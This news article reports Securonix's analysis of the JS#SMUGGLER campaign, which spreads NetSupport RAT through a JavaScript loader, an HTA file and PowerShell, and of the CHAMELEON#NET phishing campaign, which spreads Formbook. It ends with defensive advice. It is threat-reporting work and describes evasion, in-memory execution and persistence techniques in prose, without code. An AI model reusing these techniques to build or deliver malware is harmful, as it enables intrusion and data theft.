Cybersecurity experts have uncovered a new campaign known as JS#SMUGGLER. This operation exploits compromised websites to distribute a remote access trojan (RAT) called NetSupport RAT. The investigation, conducted by Securonix, reveals a complex attack chain involving several critical components.
Attack Chain Analysis
JS#SMUGGLER integrates a three-part system:
- An obfuscated JavaScript loader embedded in compromised websites.
- An HTML Application (HTA) that executes encrypted PowerShell scripts using “mshta.exe.”
- A PowerShell payload designed to download and run the primary malware.
According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, NetSupport RAT provides attackers with extensive capabilities. These include remote desktop access, file management, command execution, data theft, and proxy functionalities.
Target Demographics and Methods
This campaign primarily targets enterprise users, highlighting a broad attack strategy. Securonix describes it as a multi-stage, web-based malware operation that employs techniques such as hidden iframes and obfuscated loaders to facilitate the distribution and execution of the malicious payload.
The initial phase uses silent redirects embedded in infected websites. This redirects users to a heavily encrypted JavaScript loader named “phone.js,” which profiles the user’s device. Depending on the device type, either a full-screen iframe or a second-stage remote script is activated.
The JavaScript loader incorporates a unique tracking mechanism. This ensures that the malicious logic activates only once during a user’s initial visit, significantly lowering detection risks. Such device-aware approaches allow attackers to customize how infections spread and minimize their visibility.
Deployment Mechanics
The remote script lays groundwork by generating a URL to download the HTA payload, which is executed via “mshta.exe.” This HTA serves as another loader that handles a temporary PowerShell stager, which is then decrypted and executed directly in memory, to evade detection.
To further obscure its activities, the HTA file runs in a stealthy mode, minimizing its visual footprint. After executing the decrypted payload, it attempts to erase evidence by removing the PowerShell stager from disk and terminating itself.
Consequences and Recommendations
The main objective of the PowerShell payload is to acquire and deploy NetSupport RAT, granting attackers full control over affected systems. Securonix emphasizes that the sophistication observed suggests a well-maintained malware framework.
To counter such threats, cybersecurity defenses should implement strong Content Security Policy (CSP) measures, monitor scripts closely, enable PowerShell logging, restrict “mshta.exe,” and utilize behavioral analytics to identify potential attacks.
Related Campaign: CHAMELEON#NET
Recently, Securonix also disclosed another campaign named CHAMELEON#NET, targeting users in the National Social Security Sector. This campaign relies on phishing emails to distribute Formbook, a keylogger and information-stealing malware.
The phishing emails entice users to download a seemingly harmless archive. Once downloaded, a heavily obfuscated JavaScript file acts as a dropper, initiating a multi-stage infection sequence that eventually executes Formbook RAT from memory.
Key Techniques in CHAMELEON#NET
- The use of a custom decryption routine for enhanced evasion.
- Reflection and conditional XOR operations to decrypt and run malware.
- Persistence methods through Windows startup folder and Registry modifications.
Securonix notes that the tactics employed in both JS#SMUGGLER and CHAMELEON#NET demonstrate a combination of social engineering and advanced obfuscation techniques, making detection challenging for security solutions.
